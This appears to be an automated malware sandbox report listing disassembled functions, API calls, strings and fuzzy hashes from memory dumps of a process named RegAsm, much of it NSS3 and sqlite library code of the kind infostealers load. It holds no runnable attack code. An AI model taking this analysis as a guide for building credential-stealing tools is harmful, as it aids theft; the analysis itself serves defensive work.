Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB58FA0,00000000,?,?,?,?,6CA37D8F,?,?), ref: 6CA36DF7

Part of subcall function 6CA8B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB618D0,?), ref: 6CA8B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA36E35

Part of subcall function 6CA8FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CA8FE29
Part of subcall function 6CA8FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CA8FE3D
Part of subcall function 6CA8FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CA8FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA36E4C

Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB58FE0,00000000), ref: 6CA36E82

Part of subcall function 6CA36AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CA3B21D,00000000,00000000,6CA3B219,?,6CA36BFB,00000000,?,00000000,00000000,?,?,?,6CA3B21D), ref: 6CA36B01
Part of subcall function 6CA36AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CA36B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA36F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA36F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB58FE0,00000000), ref: 6CA36F6B
PR_SetError.NSS3(FFFFE005,00000000,6CA37D8F,?,?), ref: 6CA36FE1

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: f8284a4104f31ba62f648c91efede35cbb6744f5e059903f5d9f3fda5083fb92
Instruction ID: 59a9b10d78695c0ca13b14d9109c9ec70c4331b4b6be0f58eede6e9d77f638e5
Opcode Fuzzy Hash: f8284a4104f31ba62f648c91efede35cbb6744f5e059903f5d9f3fda5083fb92
Instruction Fuzzy Hash: FD719071D112569BDB00CF55CE50BAABBB4BF58308F195229E808DBB11F771EAD8CB90

Function 6CA7ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AE10
EnterCriticalSection.KERNEL32(?,?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6CA5D079,00000000,00000001), ref: 6CA7AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AE7F
TlsGetValue.KERNEL32(?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AEF1
free.MOZGLUE(6CA5CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA5CDBB,?), ref: 6CA7AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AF30

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: d141c14be550bb902c04a3839ffc2ae970b0b9485102fe1a117db39b3b2bfa05
Instruction ID: 58d25e06c2dbe526bdd6d695ab8316bfa5923a85d41af9297ce70567cff9af23
Opcode Fuzzy Hash: d141c14be550bb902c04a3839ffc2ae970b0b9485102fe1a117db39b3b2bfa05
Instruction Fuzzy Hash: 84518DB9A01A01EFDB10DF25D884B5AB7B5FF05318F185264E81997E11E731ECA8CBE1

Function 6CA54CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA5AB7F,?,00000000,?), ref: 6CA54CB4
EnterCriticalSection.KERNEL32(0000001C,?,6CA5AB7F,?,00000000,?), ref: 6CA54CC8
TlsGetValue.KERNEL32(?,6CA5AB7F,?,00000000,?), ref: 6CA54CE0
EnterCriticalSection.KERNEL32(?,?,6CA5AB7F,?,00000000,?), ref: 6CA54CF4
PL_HashTableLookup.NSS3(?,?,?,6CA5AB7F,?,00000000,?), ref: 6CA54D03
PR_Unlock.NSS3(?,00000000,?), ref: 6CA54D10

Part of subcall function 6CADDD70: TlsGetValue.KERNEL32 ref: 6CADDD8C
Part of subcall function 6CADDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CADDDB4

PR_Now.NSS3(?,00000000,?), ref: 6CA54D26

Part of subcall function 6CAF9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB40A27), ref: 6CAF9DC6
Part of subcall function 6CAF9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB40A27), ref: 6CAF9DD1
Part of subcall function 6CAF9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAF9DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6CA54D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CA54DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CA54E02

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: db07533e5704a49f43e700437f6f2f4d36d1a4fbb12733bd3f847d6baf0d6d19
Instruction ID: 17e12581f9a6c1ce5f76c14819d0aeef1d971c389dadbf8fd301206e867c686c
Opcode Fuzzy Hash: db07533e5704a49f43e700437f6f2f4d36d1a4fbb12733bd3f847d6baf0d6d19
Instruction Fuzzy Hash: 3C41A8B6900605ABEB015F34EE44A5677B8AF05259F498170EC1987B12FB31D9B8C7E1

Function 6CA32E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA32CDA,?,00000000), ref: 6CA32E1E

Part of subcall function 6CA8FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA39003,?), ref: 6CA8FD91
Part of subcall function 6CA8FD80: PORT_Alloc_Util.NSS3(A4686CA9,?), ref: 6CA8FDA2
Part of subcall function 6CA8FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CA9,?,?), ref: 6CA8FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CA32E33

Part of subcall function 6CA8FD80: free.MOZGLUE(00000000,?,?), ref: 6CA8FDD1

TlsGetValue.KERNEL32 ref: 6CA32E4E
EnterCriticalSection.KERNEL32(?), ref: 6CA32E5E
PL_HashTableLookup.NSS3(?), ref: 6CA32E71
PL_HashTableRemove.NSS3(?), ref: 6CA32E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6CA32E96
PR_Unlock.NSS3 ref: 6CA32EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA32EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA32EC5

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: cadee4b44896537f48fd017471eca9a6fc40f45d2bbd5341d1bebe7fe72cd3f9
Instruction ID: 5ece78cf4718d2ba1bf272670635249193bcfee102502ec744bf6660ff31f20b
Opcode Fuzzy Hash: cadee4b44896537f48fd017471eca9a6fc40f45d2bbd5341d1bebe7fe72cd3f9
Instruction Fuzzy Hash: 5221F572E00111A7EF001E65EE0AEDA3A79EB5221DF280530ED18C3752F732D5ACD6E2

Function 6CA1FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CA1FD18
sqlite3_initialize.NSS3 ref: 6CA1FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA1FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CA1FD99
sqlite3_free.NSS3(00000000), ref: 6CA1FE3C
sqlite3_free.NSS3(?), ref: 6CA1FEE3
sqlite3_free.NSS3(?), ref: 6CA1FEEE

Strings

simple, xrefs: 6CA1FC79

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: 3e4c29eaecfa1e083832026ba377f1e956518280032251d0920baf8629587b59
Instruction ID: 832963ee8183b2075b2e309e6bc8dc2793b23f7f1a84e82d051e6e7a7c7d40be
Opcode Fuzzy Hash: 3e4c29eaecfa1e083832026ba377f1e956518280032251d0920baf8629587b59
Instruction Fuzzy Hash: 7A9183B4A052459FDB04CF65CD80A6AF7B2FF85318F29C16DD819ABB52D731E881CB90

Function 6CA25CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CA25EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA25EED

Strings

unable to close due to unfinalized statements or unfinished backups, xrefs: 6CA25E64
misuse, xrefs: 6CA25EDB
API call with %s database connection pointer, xrefs: 6CA25EC3
invalid, xrefs: 6CA25EBE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA25ED1
%s at line %d of [%.10s], xrefs: 6CA25EE0

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: abce327e2335e9d76022d57f5e9b24043cdd3eb4ac822edd2a7a57a80849f4c3
Instruction ID: b1dae47282ee18278e6f145cc5405e56aacd479c267275e482805a76f94cdb21
Opcode Fuzzy Hash: abce327e2335e9d76022d57f5e9b24043cdd3eb4ac822edd2a7a57a80849f4c3
Instruction Fuzzy Hash: 8081D330B066219BEB19CF25C848B6A7770BF4231CF2C4669D8155BF59D738E882CBD1

Function 6CA0DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA0DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA0DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA0DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CA0DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA0DF78

Strings

database corruption, xrefs: 6CA0DE5C, 6CA0DE8B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA0DE52, 6CA0DE81
%s at line %d of [%.10s], xrefs: 6CA0DE61, 6CA0DE90

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: b1a74fd670f77b16864f7031b1184207c239be4e9297c0d4d8290a1c09a34d36
Instruction ID: 1c067283dbe884ee784620c01105d6f6cb5e281dfb4df6d3d8faa5f504c9c83d
Opcode Fuzzy Hash: b1a74fd670f77b16864f7031b1184207c239be4e9297c0d4d8290a1c09a34d36
Instruction Fuzzy Hash: 3881D272B053009FD714CF25E880B6AB7F1AF5534CF18882DF89A8BA51E731E885CB52

Function 6C9BCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C9BB999), ref: 6C9BCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C9BB999), ref: 6C9BD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C9BB999), ref: 6C9BD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C9BB999), ref: 6CB0972B

Strings

database corruption, xrefs: 6C9BCFE7, 6C9BD013, 6C9BD028, 6C9BD039, 6C9BD03E, 6CB09786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9BCFDD, 6C9BD00E, 6C9BD022, 6C9BD033, 6CB09780
%s at line %d of [%.10s], xrefs: 6C9BCFEC, 6C9BD018, 6C9BD029, 6C9BD03F, 6CB0978B

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: a2995eccdbdd965debd68065e0c171937a7a7a9030ec0bf8b9c13f515c409262
Instruction ID: 2193c7c56f7920e095b6390f7ccad50efb0ecbb4038e2fa5aa6780cba17b68f1
Opcode Fuzzy Hash: a2995eccdbdd965debd68065e0c171937a7a7a9030ec0bf8b9c13f515c409262
Instruction Fuzzy Hash: 87613972A042509BD310CF29C840BA7BBF5EF65319F2885ADE448AFB42D376D847C7A1

Function 0040DB7F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,76885460,?,00000000), ref: 0040DBBB
strchr.MSVCRT ref: 0040DBCD
strchr.MSVCRT ref: 0040DBF2
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
strcpy_s.MSVCRT ref: 0040DC6F

Strings

0123456789ABCDEF, xrefs: 0040DB99

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 453150750-2554083253
Opcode ID: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
Instruction ID: be699800860e389eb7f033a368984428232de7924aec9246af203248711cb49e
Opcode Fuzzy Hash: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
Instruction Fuzzy Hash: 18315D71D002199FDB00DFE8DC49ADEBBB9AF09355F100179E901FB281DB79A909CB94

Function 6CA33E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 6CA340D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CA33F7F,?,00000055,?,?,6CA31666,?,?), ref: 6CA340D9
Part of subcall function 6CA340D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CA31666,?,?), ref: 6CA340FC
Part of subcall function 6CA340D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CA31666,?,?), ref: 6CA34138

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA33EC2
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA33ED6

Part of subcall function 6CA8B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB618D0,?), ref: 6CA8B095

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA33EEE

Part of subcall function 6CA8FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA88D2D,?,00000000,?), ref: 6CA8FB85
Part of subcall function 6CA8FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA8FBB1

PR_CallOnce.NSS3(6CB92AA4,6CA912D0), ref: 6CA33F02
PL_FreeArenaPool.NSS3 ref: 6CA33F14
PL_FinishArenaPool.NSS3 ref: 6CA33F1C

Part of subcall function 6CA964F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CA9127C,00000000,00000000,00000000), ref: 6CA9650E

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA33F27

Strings

security, xrefs: 6CA33EBC

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
String ID: security
API String ID: 1076417423-3315324353
Opcode ID: 69a88f0884b2c6b354310f05ac50b71da76bbc7712a41fdbf0ecf7ef9e68e8ee
Instruction ID: 7871ea5ceeacc924cf86e595cb7438f2aebc708623078632528592edb51b6e09
Opcode Fuzzy Hash: 69a88f0884b2c6b354310f05ac50b71da76bbc7712a41fdbf0ecf7ef9e68e8ee
Instruction Fuzzy Hash: DC2128769083006BD3009B25AC02FAB77B8AB8971CF04093DF949A7B81E730D55C8796

Function 0041F944 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 0041F969

Part of subcall function 0041F504: Replicator::operator[].LIBCMT ref: 0041F587
Part of subcall function 0041F504: DName::operator+=.LIBCMT ref: 0041F58F

DName::operator+.LIBCMT ref: 0041F9C2
DName::DName.LIBCMT ref: 0041FA1A

Strings

void, xrefs: 0041FA12
<ellipsis>, xrefs: 0041FA04
,<ellipsis>, xrefs: 0041F9B5
..., xrefs: 0041F9FD, 0041FA09
,..., xrefs: 0041F9AE, 0041F9BA

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
